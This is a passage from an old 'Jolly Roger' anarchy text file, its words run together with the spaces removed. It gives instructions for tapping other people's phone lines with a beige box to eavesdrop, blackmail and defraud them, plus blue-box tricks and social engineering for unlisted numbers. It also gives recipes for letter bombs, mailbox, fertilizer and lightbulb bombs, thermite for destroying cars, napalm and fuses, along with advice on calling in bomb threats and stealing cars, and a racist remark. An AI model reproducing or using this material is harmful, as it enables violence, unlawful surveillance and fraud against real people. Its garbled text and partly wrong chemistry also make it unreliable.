andlookatthebottomofit'scasing.Thereshouldbeagreyjackwithfour wires(red,green,yellow&black)leadingoutofit.Totheendoftheredwire attacharedalligatorclip.Totheendofthegreenwireattachagreen alligatorclip.Theyellowandblackwirescanberemoved,althoughIwouldonly setthemasidesothatyoucanusethemodularjackinfutureprojects.Now insertyourtelephone'smodularplugintothemodularjack.That'sit.This particularmodelisnicebecauseitiscanbeeasilymade,isinexpensive,uses commonpartsthatarereadilyavailable,issmall,islightweight,anddoesnot requirethedestructionofaphone. III.BeigeBoxUses TherearemanyusesforaBeigeBox.However,beforeyoucanuseit,youmust knowhowtoattachittotheoutputdevice.ThisdevicecanbeofanyofBell switchingapparatusthatincludegerminalsets(i.e.remoteswitchingcenters, bridginheads,cans,etc.)ToopenmostBellTelephoneswitchingapparatus,you musthavea7/16inchhexdriver(oragoodpairofneedlenoseplierswork also).Thispieceofequipmentcanbepickedupatyourlocalhardwarestore. Withyourhexdriver(orpliers),turnthesecuritybolt(s)approximately1/8of aninchcounterclockwiseandopen.Ifyouroutputdeviceislocked,thenyou musthavesomeknowledgeofdestroyingand/orpickinglocks.However,wehave neverencounteredalockedoutputdevice.Onceyouhaveopenedyouroutput device,youshouldseeamassofwiresconnectedtoterminals.Onmostoutput devices,theterminalsshouldbelabeled"T"(Tipifnotlabeled,itis usuallyontheleft)and"R"(Ringifnotlabeled,usuallyontheright). Remember:Ringredright.The"ThreeR's"asimplewaytorememberwhich iswhich.Nowyoumustattachalltheredalligatorclip(Ring)tothe"R" (Ring)terminal.Attachthegreenalligatorclip(Tip)tothe"T"(Tip) terminal. Note:Ifinsteadofadialtoneyouhearnothing,adjustthealligatorclipsso thattheyarenottouchingeachotherterminals.Alsomakesuretheyarefirmly attached.Bythistimeyoushouldhearadialtone.DialANItofindoutthe numberyouareusing(youwouldn'twanttouseyourown).Herearesome practicalapplications: Eavesdropping Longdistance,staticfree,freefonecallstophriends DialingdirecttoAllianceTeleconferencing(alsonostatic) Phuckingpeopleover Botheringtheoperatoratlittlerisktoyourself BlueBoxingwithgreatlyreducedchanceofgettingcaught Anythingatallyouwant,sinceyouareonanextensionofthatline

Eavesdropping Tobemosteffective,firstattachtheBeigeBoxthenyourphone.This eliminatesthestaticcausedbyconnectingthebox,thereforereducingthe potentialsuspicionofyourvictim.Wheneavesdropping,itisalwaysbesttobe neitherseennorheard.Ifyouhearsomeonedialingout,donotpanic;but ratherhangup,wait,andpickupthereceiveragain.Thepersonwilleither havehunguportriedtocompletetheircallagain.Ifthelatteristrue,then listenin,andperhapsyouwillfindinformationworthyofblackmail!Ifyou wouldliketoknowwhoyouarelisteningto,afterdialingANI,pullaCN/Aon thenumber. DialingLongDistance Thissectionisselfexplanatory,butdon'tforgettodiala"1"beforetheNPA. DialingDirecttoAllianceTeleconferencing Simplydial07004561000andyouwillgetinstructionsfromthere.Iprefer thismethodoverPBX's,sincePBX'softenhavepoorreceptionandaremore difficulttocomeby.

PhuckingPeopleOver Thisisaverylargetopicofdiscussion.Justbyusingtheothertopics described,youcancreatealargephonebillfortheperson(theywillnothave topayforit,butitwillbeabighassleforthem).Inaddition,sinceyouare anextensionoftheperson'sline,youcanleaveyourphoneoffthehook,and theywillnotbeabletomakeorreceivecalls.Thiscanbeextremelynasty becausenoonewouldexpectthecauseoftheproblem. BotheringtheOperator Thisisalsoselfexplanatoryandcanprovidehoursofentertainment.Simplyask herthingsthatareoffensiveoryouwouldnotliketracedtoyourline.This alsocorrespondstothepreviouslydescribedsection,PhuckingPeopleOver. Afterall,guesswho'slineitgetstracedto? BlueBoxing SeeafileonBlueBoxingformoredetails.Thisisanespeciallynicefeature ifyouliveinanESSequippedprefix,sincethecallsare,onceagain,not tracedtoyourline... IV.POTENTIALRISKSOFBEIGEBOXING OveruseoftheBeigeBoxmaycausesuspicionswithintheGestapo,andresultin legalproblems.Therefor,Iwouldrecommendyou: ChooseasecludedspottodoyourBeigeBoxing, Usemorethanoneoutputdevice Keepalowprofile(i.e.,donotpostunderyourrealnameonapublicBBS concerningyouraccomplishments) Inordertomakesuretheenemyhasnotbeeninsideyouroutputdevice,I recommendyouplaceapieceoftransparenttapeovertheopeningofyouroutput device.Therefor,ifitisopenedinyourabsence,thetapewillbedisplaced andyouwillbeawareofthefactthatsomeonehasintrudedonyourterritory. Now,imaginethepossibilities:a$2000dollarphonebillforthatspecial person,976numbersgalore,evenharassingtheoperatoratnorisktoyou! Thinkofitaswalkingintoanenemieshouse,andusingtheirphonetoyour heart'scontent. 9.HowtomakeaCObombbytheJollyRoger Youwillhavetouseupthecartridgefirstbyeithershootingitorwhatever. Withanail,forceaholebiggersoastoallowthepowderandwicktofitin easily.Fillthecartridgewithblackpowderandpackitinthererealgoodby tappingthebottomofthecartridgeonahardsurface(IsaidTAPnotSLAM!). Insertafuse.Irecommendagoodwaterproofcannonfuse,oranm80typefuse, butfirecrackerfuseswork,ifyoucanrunlikeablackmanrunsfromthecops afterrapingawhitegirl.)Now,lightitandrunlikehell!Itdoeswondersfor arowofmailboxes(liketheonesinapartmentcomplexes),acar(placeunder thegastank),apicturewindow(placeonwindowsill),aphonebooth(place rightunderthephone),oranyotherdeviousplace.Thisthingthrowsshrapnel, andcanmakequitamess!! 10.ThermiteIIbyJollyRoger Thermiteisnastyshit.Hereisagoodandeasywaytomakeit.Thefirststep istogetsomeironoxide(whichisRUST!).Hereisagoodwaytomakelarge quantitiesinashorttime: GetaDCconverterliketheoneusedonatrainset.Cuttheconnector

off,separatethewires,andstripthemboth. Nowyouneedajarofwaterwithatablespoonorsoofsodiumchloride (whichisSALT!)addedtoit.Thismakesthewaterconductive. Nowinsertbothwiresintothemixture(Iamassumingyoupluggedthe converterin...)andletthemsitforfiveminutes.Oneofthemwillstart bubblingmorethantheother.ThisisthePOSITIVE(+)wire.Ifyoudonotdo thistestright,thefinalproductwillbetheopposite(chemically)ofrust, whichisRUSTACID.Youhavenouseforthishere(althoughitISuseful!). Anyway,putthenailtiedtothepositivewireintothejar.Nowputthe negativewireintheotherend.Nowletitsitovernightandinthemorning scrapetherustoffofthenail&repeatuntilyougotabunchofrustonthe bottomoftheglass.Begenerouswithyourrustcollection.Ifyouaregoing throughthetroubleofmakingthermite,youmightaswellmakealot,right? Nowremovetheexcesswaterandpourthecrustysolutionontoacookie sheet.Dryitinthesunforafewhours,orinsideovernight.Itshouldbean orangebrowncolor(althoughIhaveseenitinmanydifferentcolors!Sometimes thecolorgetsfuckedup,whatcanIsay...butitisstillironoxide!) Crushtherustintoafinepowderandheatitinacastironpotuntilit isred.Nowmixthepureironoxidewithpurealuminumfilingswhichcanbe boughtorfileddownbyhandfromanaluminumtubeorbar.Theratiooriron oxidetoaluminumis8gramsto3grams. Congrats!YouhavejustmadeTHERMITE!Now,tolightit...

ThermiterequiresaLOTofheat(morethanablowtorch!)toignite. However,magnesiumribbon(whichissortofhardtofind..callaround)willdo thetrick.Ittakestheheatfromtheburningmagnesiumtolightthethermite. Nowwhenyouseeyourvictim'scar,pourafiftycentsizedpileontohis hood,sticktheribboninit,andlighttheribbonwiththeblowtorch.Now chuckleasyouwatchitburnthroughthehood,theblock,theaxle,andthe pavement.BECAREFUL!TheidealmixturescanvaporizeCARBONSTEEL!Anotheridea istousethermitetogetintopayphonecashboxes. 11.TouchExplosivesbytheJollyRoger Thisissortofamildexplosive,butitcanbequitedangerousinlarge quantities.Tomaketouchexplosive(suchasthatfoundinasnapnpop,but morepowerful),usethisrecipe: Mixiodinecrystalsintoammoniauntiltheiodinecrystalswillnot dissolveintotheammoniaanymore.Pourofftheexcessammoniaanddryoutthe crystalsonabakingsheetthesamewayasyoudriedthethermite(inother words,justletitsitovernight!). Becarefulnowbecausethesecrystalsarenowyourtouchexplosive. Carefullywrapabunchinpaper(Imeancarefully!Frictionsets'emoff!)and throwthemaround..prettyloud,huh?Theyarefuntoputonsomeone'schair. Addasmallfishsinkertothemandtheycanbethrownalongdistance(goodfor crowds,footballgames,concerts,etc.) 12.LetterBombsbyTheJollyRoger Youwillfirsthavetomakeamildversionofthermite.Usemyrecipe,but substituteironfillingsforrust.

Mixtheironwithaluminumfillingsinaratioof75%aluminumto25% iron.Thismixturewillburnviolentlyinaclosedspace(suchasanenvelope). Thisbringustoournextingredient... Gotothepostofficeandbuyaninsulated(padded)envelope.Youknow, thetypethatisdoublelayered.Separatethelayersandplacethemildthermite inthemainsection,wheretheletterwouldgo.Thenplacemagnesiumpowderin theouterlayer.Thereisyourbomb!! Nowtolightit...thisisthetrickypartandhardtoexplain.Justkeep experimentinguntilyougetsomethingthatworks.Thefuseisjustthattouch explosiveIhavetoldyouaboutinanotheroneofmyanarchyfiles.Youmight wanttowrapitlikealongcigaretteandthenplaceitatthetopofthe envelopeintheouterlayer(ontopofthepowderedmagnesium).Whenthetouch explosiveistornorevensqueezedharditwillignitethepowderedmagnesium (sortofaflashlight)andthenitwillburnthemildthermite.Ifthethermite didn'tblowup,itwouldatleastburnthefuckoutofyourenemy(itdoes wondersonhumanflesh!). 13.PaintBombsbyTheJollyRoger Tomakeapainbombyousimplyneedametalpaincanwitharefastenablelid,a nicebrightcolorpaint(green,pink,purple,orsomegrosscolorisperfect!), andaquantityofdryice.Placethepaintinthecanandthendropthedryice in.Quicklyplacethetoponandthenrunlikehell!Withsometestingyoucan timethistoascience.Itdependsontheratioofdryicetopainttothesize ofthecantohowfullitis.Ifyouarereallypissedoffatsomeone,youcould placeitontheirdoorstep,knockonthedoor,andthenrun!!Paintwillflyall overtheplace!! 14.WaystosendacartoHellbyTheJollyRoger Thereare1001waystodestroyacarbutIamgoingtocoveronlytheonesthat arethemostfun(foryou),themostdestructive(forthem),andthehardestto trace(forthecops). Placethermiteonthehood,lightit,andwatchitburnalltheway throughthepavement! TapeaCObombtothehood,axle,gastank,wheel,muffler,etc.

Putatampon,dirt,sugar(thisoneisgood!),apingpongball,orjust aboutanythingthatwilldissolveinthegastank. Putpotatoes,rocks,bananas,oranythingthatwillfit,intothe tailpipe.Useabroomhandletostuff'emupintothetailpipe. Putalongragintothegastankandlightit... Stealakey,copyit,replaceit,andthenstealthestereo. Breakintothecar.Cutathinmetalrulerintoashapelikethis:

Slideitintotheoutsidewindowandkeeppullingitbackupuntilyoucatchthe lockcablewhichshouldunlockthedoor.ThisdeviceisalsocalledaSLIMJIM. Nowgetthestereo,equalizer,radardetector,etc.Nowdestroytheinside.(A sharpknifedoeswondersontheseats!)

15.Doyouhateschool?byTheJollyRoger Oneofmyfavoritesforgettingoutofaclassortwoistocallinabomb threat.Tell'emthatitisinalocker.Thentheyhavetocheckthemall, whilstyoucanslipawayforanhourortwo.Youcanevenplaceafakebomb(in anylockerbutYOURS!).Theymightcancelschoolforaweekwhilethey investigate(ofcourse,youwillprobablyhavetomakeitupinthesummer). Getsomepurepotassiumorpuresodium,putitinacapsule,andflushit downthetoilet(smellsawful!Stinksupthewholeschool!). Useasmokegrenadeinthehallway.

Stealthecomputerpasswords&keys.Orstealthe80columncardsinside iftheyare(gag)IBM. Makefriendswithstudentassistantsandhavethemchangeyourgradeswhen theteachershandintheirbubblesheetsforthereportcards. Spityourgumoutonthecarpetinthelibraryorwhateverandgrindit intothecarpet.Watchthejanitorscry! Drawonlockersorspraypaintonthebuildingthattheprincipalisa fascist. Stickapotatointhetailpipeoftheprincipal'scar. USEYOURIMAGINATION!

16.PhonerelatedvandalismbytheJollyRoger Ifyoulivewherethereareundergroundlinesthenyouwillbeabletoruin someone'sphonelifeveryeasily.Allyoumustdoisgototheirhouseandfind thegreenjunctionboxthatinterfacestheirline(andpossiblysomeothersin theneighborhood)withthemajorlines.Thesecanbefoundjustaboutanywhere buttheyareusuallyunderneaththenearestphonepole.Takeasocketwrenchand loosenthenutontheright.Thenjusttakeclippersorasledgehammerora bombanddestroytheinsidesandpulluptheirphonecable.Nowcutitinto segmentssoitcan'tbefixedbutmustbereplaced(Thereisaweek'sworthof workfor'em!!) 17.HighwayradarjammingbyTheJollyRoger Mostdriverswantingtomakebettertimeontheopenroadwillinvestinoneof thoseexpensiveradardetectors.However,thisdevicewillnotworkagainsta guntyperadarunitinwhichtheradarsignalisnotpresentuntilthecophas yourcarinhissightsandpullsthetrigger.ThenitisTOOLATEforyouto slowdown.Abettermethodistocontinuouslyjamanysignalwitharadarsignal ofyourown.Ihavetestedthisideawiththecooperationofalocalcopand foundthathisunitreadsrandomnumberswhenmycarapproachedhim.Itis suprisinglyeasytomakealowpowerradartransmitter.Aniftylittle semiconductorcalledaGunnDiodewillgeneratemicrowaveswhensuppliedwith the5to10voltDCandenclosedinthecorrectsizecavity(resonator).An8to 3terminalregulatorcanbeusedtogetthisvoltagefromacar's12vsystem. However,thecorrectconstructionandtuningofthecavityisdifficultwithout goodmicrowavemeasurementequipment.PoliceradarscommonlyoperateontheK bandat22GHz.OrmoreoftenontheXbandat1025GHz.mostmicrowave intruderalarmsandmotiondetectors(mountedoverautomaticdoorsin supermarkets&banks,etc.)containaGunntypetransmitter/receivercombination

thattransmitsabout10kilowattsat1025GHz.Theseunitsworkperfectlyas jammers.Ifyoucannotgetonelocally,writetoMicrowaveAssociatesin Burlington,Massachusettsandaskthemforinfoon'Gunnplexers'forhamradio use.Whenyougettheunititmaybemountedinaplasticboxonthedashorin aweatherproofenclosurebehindthePLASTICgrille.Switchonthepowerwhenon anopenhighway.Theunitwillnotjamradartothesideorbehindthecarso don'tgospeedingpasttheradartrap.Aninterestingphenomenayouwillnotice isthatthedriverswhoareinfrontofyouwhoareusingdetectorswillhit theirbrakesasyouapproachlargemetalsignsandbridges.Yoursignalis bouncingoffoftheseobjectsandtriggeringtheirradardetectors! PSIfyouareinterestedinthissortofthing,getacopyofPOPULAR COMMUNICATIONS.Theadsintheretellyouwhereyoucangetallkindsofinfoon allkindsofneatequipmentforallkindsofneatthings! 18.SmokeBombsbytheJollyRoger Hereistherecipeforonehellofasmokebomb! 4partssugar 6partspotassiumnitrate(SaltPeter) HeatthismixtureoveraLOWflameuntilitmelts,stirringwell.Pouritintoa futurecontainerand,beforeitsolidifies,imbedafewmatchesintothemixture touseasfuses.Onepoundofthisstuffwillfillupawholeblockwiththick, whitesmoke! 19.MailBoxBombsbytheJollyRoger 1. 2. 3. Twoliterbottleofchlorine(mustcontainsodiumhypochlorate) Smallamountofsugar Smallamountofwater

Mixallthreeoftheseinequalamountstofillabout1/10ofthebottle.Screw onthelidandplaceinamailbox.It'shardtobelievethatsuchasmall explosionwillliterallyripthemailboxinhalfandsendit20feetintothe air!Becarefuldoingthis,though,becauseifyouarecaught,itisnotupto thepersonwhosemailboxyoublewuptopresscharges.Itisuptothecity. 20.TheeasiestwaytohotwirecarsbytheJollyRoger Getinthecar.Lookunderthedash.Ifit'senclosed,forgetitunlessyouwant tocutthroughit.Ifyoudo,doitneartheignition.Onceyougetbehindor neartheignitionlookfortworedwires.Inoldercarsredwasthestandard color,ifnot,lookfortwomatchedpairs.Whenyoufindthem,crossthemand takeoff! 21.HowtomakeNapalmbytheJollyRoger Poursomegasintoanoldbowl,orsomekindofcontainer. Getsomestyrofoamandputitinthegas,untilthegaswon'teatanymore. Youshouldhaveastickysyrup. Putitontheendofsomething(don'ttouchit!!).Theunusedstufflasts alongtime! 22.HowtomakeafertilizerbombbyTheJollyRoger

Ingredients: Newspaper Fertilizer(thechemicalkind,GREENTHUMBorORCHO) Cotton Dieselfuel

Makeapouchoutofthenewspaperandputsomefertilizerinit.Thenputcotton ontop.Soakthecottonwithfuel.Thenlightandrunlikeyouhaveneverran before!Thisblowsup500squarefeetsodon'tdoitinanalley!! 23.TennisBallBombsbyTheJollyRoger Ingredients: Strikeanywherematches Atennisball Anicesharpknife Ducttape

Breakatonofmatchheadsoff.ThencutaSMALLholeinthetennisball.Stuff allofthematchheadsintotheball,untilyoucan'tfitanymorein.Thentape overitwithducttape.Makesureitisrealniceandtight!Then,whenyousee ageekwalkingdownthestreet,giveitagoodthrow.Hewillhaveablast!! 24.DisketteBombsbyTheJollyRoger Youneed: Adisk Scissors Whiteorbluekitchenmatches(theyMUSTbethesecolors!) Clearnailpolish

1. Carefullyopenupthediskette(3"disksarebestforthis!) 2. Removethecottoncoveringfromtheinside. 3. Scrapealotofmatchpowderintoabowl(useawoodenscraper,metal mightsparkthematchpowder!) 4. Afteryouhavealot,spreaditevenlyonthedisk. 5. Usingthenailpolish,spreaditoverthematchmixture 6. Letitdry 7. Carefullyputthediskettebacktogetherandusethenailpolishtoseal itshutontheinside(whereitcameapart). Whenthatdiskisinadrive,thedriveheadattemptstoreadthedisk,which causesasmallfire(ENOUGHHEATTOMELTTHEDISKDRIVEANDFUCKTHEHEADUP!!). LetthefuckheadtryandfixTHAT!!! 25.UnlistedPhoneNumbersbyTheJollyRoger Thereareacoupleofdifferentwaysofdoingthis.Let'sseeifthisonewill help:Everycityhasoneormoreofficesdedicatedtoassigningnumberstothe telephonewirepairs.TheseofficesarecalledDPACofficesandareavailableto servicerepswhoareinstallingorrepairingphones.TogettheDPACnumber,a servicerepwouldcallthecustomerservicenumberforbillinginformationin thetownthatthenumberislocatedinthatheistryingtogettheunlisted numberof.(Gotthat?)Theconversationwouldgosomethinglikethis:"Hi, Amarillo,thisisJoefromAnytownbusinessoffice,IneedtheDPACnumberfor thesouthsideoftown."Thisinfoisusuallypassedoutwithnoproblems,so...

ifthefirstpersonyoucalldoesn'thaveit,tryanother.REMEMBER,noonehas ANYIDEAwhothehellyouarewhenyouaretalkingonthephone,soyoucanbe anyoneyoudamnwellplease!WhenyoucalltheDPACnumber,justtellthemthat youneedalistingforeithertheaddressthatyouhave,orthename.DPACDOES NOTSHOWWHETHERTHENUMBERISLISTEDORUNLISTED!!Also,ifyou'regoingto makeahabitofchasingnumbersdown,youmightwanttocheckintogettinga crisscrossdirectory,whichlistsphonenumbersbytheiraddresses.Itcostsa couplehundredbucks,butitiswellworthitifyouhavetochasemorethanone ortwonumbersdown! 26.FusesbyTheJollyRoger Youwouldbesurprisedhowmanyfilesareouttherethatusewhatfallsunder thecategoryofa"fuse."Theyassumethatyoujusthaveafewlyingaround,or knowwheretogetthem.Well,insomepartsofthecountry,fusesareextremely hardtocomeby...sothisfiletellsyouhowtomakeyourown.Bothfuses presentedherearefairlysimpletomake,andarefairlyreliable. SLOWBURNINGFUSE2inchesperminute Materialsneeded: Cottonstringor3shoelaces PotassiumNitrateorPotassiumChlorate Granulatedsugar

Procedure: 1. WashthecottonstringorshoelacesinHOTsoapywater,thenrinsewith freshwater 2. 3. 4. 5. Mixthefollowingtogetherinaglassbowl: 1partpotassiumnitrateorpotassiumchlorate 1partgranulatedsugar 2partshotwater Soakstringsorshoelacesinthissolution Twist/braid3strandstogetherandallowthemtodry Checktheburnratetoseehowlongitactuallytakes!!

FASTBURNINGFUSE40inchesperminute Materialsneeded: Softcottonstring Fineblackpowder(emptyafewshotgunshells!) Shallowdishorpan

Procedure: 1. 2. 3. 4. Moistenpowdertoformapaste. Twist/braid3strandsofcottontogether. Rubpasteintostringandallowtodry. Checktheburnrate!!!

27.HowtomakePotassiumNitratebyTheJollyRoger PotassiumNitrateisaningredientinmakingfuses,amongotherthings.Hereis howyoumakeit: Materialsneeded: 3gallonsofnitratebearingearthorothermaterial cupofwoodashes Bucketorothersimilarcontainerabout45gallonsinvolume 2piecesoffinelywovencloth,eachabitbiggerthanthebottomofthe bucket Shallowdishorpanatleastaslargeindiameterasthebucket Shallow,heatresistantcontainer 2gallonsofwater Somethingtopunchholesinthebottomofthebucket 1gallonofanytypeofalcohol Aheatsource Paper&tape Procedure: 1. Punchholesontheinsidebottomofthebucket,sothatthemetalis "puckered"outwardfromthebottom. 2. Spreadclothovertheholesfromthebottom.

3. Placewoodashesonthecloth.Spreaditoutsothatitcoverstheentire clothandhasaboutthesamethickness. 4. 5. Place2ndclothontopofthewoodashes. Placethedirtorothermaterialinthebucket.

6. Placethebucketovertheshallowcontainer.NOTE:Itmayneedsupporton thebottomsothattheholesonthebottomarenotblocked. 7. Boilwaterandpouritovertheearthveryslowly.DoNOTpouritallat once,asthiswillclogthefilteronthebottom. 8. 9. 10. Allowwatertorunthroughholesintotheshallowdishonthebottom. BesurethatthewatergoesthroughALLoftheearth! Allowwaterindishtocoolforanhourorso.

11. Carefullydraintheliquidinthedishaway,anddiscardthesludgeinthe bottom. 12. Boilthisliquidoverafireforatleasttwohours.Smallgrainsofsalt willformscooptheseoutwiththepaperastheyform. 13. Whentheliquidhasboileddowntoitsoriginalvolumeletitsit.

14. Afterhour,addequalvolumeofthealcohol;whenthismixtureispoured throughpaper,smallwhitecrystalsappear.Thisisthepotassiumnitrate. Purification: 1. Redissolvecrystalsinsmallamountofboilingwater.

2. 3. 4.

Removeanycrystalsthatappear. Pourthroughimprovisedfilterthenheatconcentratedsolutiontodryness. Spreadoutcrystalsandallowtodry.

28.ExplodingLightbulbsbyTheJollyRoger Materialsneeded: Lightbulb(100w) Socket(duh...) cupsoapchips Blackpowder!(opensomeshotgunshells!) cupkeroseneorgasoline Adhesivetape Lighterorsmallblowtorch Glue

Procedureforasimpleexplodinglightbulb: 1. Drillasmallholeinthetopofthebulbnearthethreads!

2. Carefullypourtheblackpowderintothehole.Useenoughsothatit touchesthefilament! 3. Insertintosocketasnormal(makesurethelightisofforelseYOUwill bethevictim!!) 4. Getthehellout!!

ProcedureforaNapalmBulb: 1. 2. 3. Heatkerosene/gasolineinadoubleboiler. Meltsoapchips,stirringslowly. Putsomewhereandallowtocool.

4. HeatthethreadsofthebulbVERYcarefullytomelttheglue.Remove threads,slowlydrawingoutthefilament.DoNOTbreakthecheapelectrical ignitersand/orthefilamentorthiswon'twork!! 5. Pourtheliquidintothebulb,andslowlylowerthefilamentbackdown intothebulb.Makesurethefilamentisdippedintothefluid. 6. Regluethethreadsbackon.Insertitintoasocketfrequentlyusedby thevictimandgetthehellout!! Whenthevictimflipstheswitch,hewillbeinforaBIGsurprise! 29.UnderwaterignitersbyTheJollyRoger Materialsneeded: Packof10silicondiodes.(AvailableatRadioShack.Youwillknowyou gottherightonesiftheyarevery,verysmallglassobjects!) Packofmatches 1candle

Procedure: 1. Lightthecandleandallowapoolofmoltenwaxtoforminthetop.

2. Takeasinglematchandholdtheglasspartofasinglediodeagainstthe head.Bendthediodepinsaroundthematchheadsothatonewrapsinanupward directionandthensticksouttotheside.Dothesamewiththeotherwire,but inadownwarddirection.Thediodesshouldnowbehuggingthematchhead,butits wiresMUSTNOTTOUCHEACHOTHER! 3. Dipthematchheadinwaxtogiveitawaterproofcoat.Thesework underwater 4. Repeattomakeasmanyasyouwant.

Howtousethem: Whentheselittledudesarehookedacrossa6vbattery,thediodereacheswhat iscalledbreakdownvoltage.Whenmostelectricalcomponentsreachthisvoltage, theyusuallyproducegreatamountsofheatandlight,whilequicklymeltinginto alittleblob.Thisheatisenoughtoigniteamatchhead.Thesearerecommended foruseunderwater,wheremostotherignitersrefusetowork. 30.HomebrewblastcannonbyTheJollyRoger Materialsneeded: 1plasticdrainpipe,3feetlong,atleast3inchesindiameter. 1smallerplasticpipe,about6incheslong,2inchesindiameter. 1largelighter,withfluidrefills(thisgobblesitup!) 1pipecaptofitthelargepipe,1pipecaptofitthesmallpipe. 5feetofbellwire. 1SPSTrockerswitch. 16vpolaroidpotapulsebattery. 15vrelay(getthisatRadioShack). ElectricalTape. Onefreeafternoon.

Procedure: Cutthebellwireintothreeequalpieces,andstriptheends.

Cutaholeinthesideofthelargepipe,thesamediameterasthesmall pipe.Threadtheholeandoneendofthesmallpipe.Theyshouldscrewtogether easily. Takeapieceofscrapmetal,andbenditintoan"L"shape,thenattachit tothelevelonthelighter: /gasswitchishere V / !lighter!!<metallever!! Now,everytimeyoupullthe'trigger'gasshouldflowfreelyfromthe lighter.Youmayneedtoenlargethe'gasport'onyourlighter,ifyouwishto beabletofiremorerapidly. Connecttwowirestothetwopostsontheswitch.

Cuttwoholesinthesideofthesmallertube,onefortheswitchonthe bottom,andoneforthemetalpieceonthetop.Then,mounttheswitchinthe bottom,runningthewiresupandoutofthetop. Mountthelighter/triggerinthetop.Nowtheswitchshouldrockeasily, andthetriggershouldcausethelightertopouroutgas.Rescrewthesmaller tubeintothelargerone,holddownthetriggerabit,letitgo,andthrowa matchinthere.Ifallgoeswell,youshouldhearanicebig'THUD!' Getaholdoftherelay,andtakeoffthetop.

1 v/ 2/<thecenterobjectisthemetalfingerinsidetherelay 3 cc/ oo4 ii ll5 Connect(1)tooneofthewirescomingfromtheswitch.Connect(2)to (4),andconnect(5)toonesideofthebattery.Connecttheremainingwirefrom theswitchtotheothersideofthebattery.Nowyoushouldbeabletogetthe relaytomakealittle'buzzing'soundwhenyoufliptheswitchandyoushould seesometinylittlesparks. Now,carefullymounttherelayontheinsideofthelargepipe,towards theback.Screwonthesmallerpipe,tapethebatterytothesideofthecannon barrel(yes,butlooksaren'teverything!) Youshouldnowbeabletoletalittlegasintothebarrelandsetitoff byflippingtheswitch. PutthecaponthebackendofthelargepipeVERYSECURELY.Youarenow readyforthefirsttrialrun! ToTest: Putsomethingvery,verylargeintothebarrel,justsothatitfits'just right'.Now,findastrongguy(therecoilwillprobablyknockyouonyourass ifyouaren'tcareful!).Putonashoulderpad,earmuffs,andpossiblysomeother protectiveclothing(trusttheJollyRoger!Youaregoingtoneedit!).Holdthe triggerdownfor30seconds,holdontight,andhittheswitch.Withluckand theproperadjustments,youshouldbeabletoputafrozenorangethroughor plywoodat25feet. 31.ChemicalEquivalencylistbyTheJollyRoger Acacia................................................................GumArabic AceticAcid..............................................................Vinegar AluminumOxide............................................................Alumia AluminumPotassiumSulphate.................................................Alum AluminumSulfate............................................................Alum AmmoniumCarbonate.....................................................Hartshorn AmmoniumHydroxide.......................................................Ammonia AmmoniumNitrate......................................................SaltPeter AmmoniumOleate.....................................................AmmoniaSoap Amylacetate...........................................................BananaOil BariumSulfide.........................................................BlackAsh CarbonCarbinate...........................................................Chalk Carbontetrachloride...............................................CleaningFluid

CalciumHypochloride............................................BleachingPowder CalciumOxide...............................................................Lime CalciumSulfate.................................................PlasterofParis CarbonicAcid............................................................Seltzer Cetyltrimethylammoniumbromide......................................AmmoniumSalt Ethylinedichloride...................................................DutchFluid FerricOxide...........................................................IronRust Furfuraldehyde..........................................................BranOil Glucose...............................................................CornSyrup Graphite.............................................................PencilLead HydrochloricAcid..................................................MuriaticAcid HydrogenPeroxide.......................................................Peroxide LeadAcetate.......................................................SugarofLead LeadTerooxide.........................................................RedLead MagnesiumSilicate..........................................................Talc MagnesiumSulfate.....................................................EpsomSalt Methylsalicylate................................................WinterGreenOil Naphthalene............................................................Mothballs Phenol.............................................................CarbolicAcid PotassiumBicarbonate............................................CreamofTarter PotassiumChromiumSulfate............................................Chromealum PotassiumNitrate.....................................................SaltPeter SodiumOxide................................................................Sand SodiumBicarbonate...................................................BakingSoda SodiumBorate..............................................................Borax SodiumCarbonate....................................................WashingSoda SodiumChloride.............................................................Salt SodiumHydroxide.............................................................Lye SodiumSilicate............................................................Glass SodiumSulfate....................................................Glauber'sSalt SodiumThiosulfate...........................................Photographer'sHypo SulfuricAcid.......................................................BatteryAcid Sucrose...............................................................CaneSugar ZincChloride.....................................................Tinner'sFluid ZincSulfate.......................................................WhiteVitriol 32.PhoneTapsbyTheJollyRoger Hereissomeinfoonphonetaps.Inthisfileisaschematicforasimple wiretap&instructionsforhookingupasmalltaperecordercontrolrelaytothe phoneline. First,Iwilldiscusstapsalittle.Therearemanydifferenttypesoftaps. Therearetransmitters,wiredtaps,andinductiontapstonameafew.Wiredand wirelesstransmittersmustbephysicallyconnectedtothelinebeforetheywill doanygood.Onceawirelesstapisconnectedtotheline,itcantransmitall conversationsoveralimitedreceptionrange.Thephonesinthehousecaneven bemodifiestopickupconversationsintheroomandtransmitthemtoo!These tapsareusuallypoweredoffofthephoneline,butcanhaveanexternalpower source.Youcangetmoreinformationonthesetapsbygettinganissueof PopularCommunicationsandreadingthroughtheads.Wiredtaps,ontheother hand,neednopowersource,butawiremustberunfromthelinetothelistener ortoatransmitter.Thereareobviousadvantagesofwirelesstapsoverwired ones.Thereisonetypeofwirelesstapthatlookslikeanormaltelephonemike. Allyouhavetodoisreplacetheoriginalmikewiththisanditwilltransmit allconversations!Thereisalsoanexotictypeofwiredtapknownasthe 'InfinityTransmitter'or'HarmonicaBug'.Inordertohookoneofthese,it mustbeinstalledinsidethephone.Whensomeonecallsthetappedphone& *before*itringsandblowsawhistleovertheline,thetransmitterpicksup thephoneviaarelay.Themikeonthephoneisactivatedsothatthecallercan hearalloftheconversationsintheroom.Thereisasweeptonetestat

415/BUG1111whichcanbeusedtodetectoneofthesetaps.Ifoneoftheseis onyourline&thetest#sendsthecorrecttone,youwillhearaclick. Inductiontapshaveonebigadvantageovertapsthatmustbephysicallywiredto thephone.Theydonothavetobetouchingthephoneinordertopickupthe conversation.Theyworkonthesameprincipleasthelittlesuctioncuptape recordermikesthatyoucangetatRadioShack.Inductionmikescanbehookedup toatransmitterorbewired. Hereisanexampleofindustrialespionageusingthephone: Asalesmanwalksintoanoffice&makesaphonecall.Hefakestheconversation, butwhenhehangsupheslipssomefoamrubbercubesintothecradle.Thecalled partycanstillhearallconversationsintheroom.Whensomeonepicksupthe phone,thecubesfallawayunnoticed. Atapcanalsobeusedonaphonetooverhearwhatyourmodemisdoingwhenyou arewardialing,hacking,orjustplaincallingabbs. Hereistheschematic: )!)!(> )!( Cap^)!( )!( )!( )!( ^^^^^)!(> ^100K ! !Youhavenow'seized'atrunk.Afterthis,switchtomultifrequency anddial: KP0700456x00xST KP=KPtoneonBlueBox x=variablebetween1and3 ST=STtoneonBlueBox TheequipmentnowthinksthattheoperatorhasdialedAlliancefromher 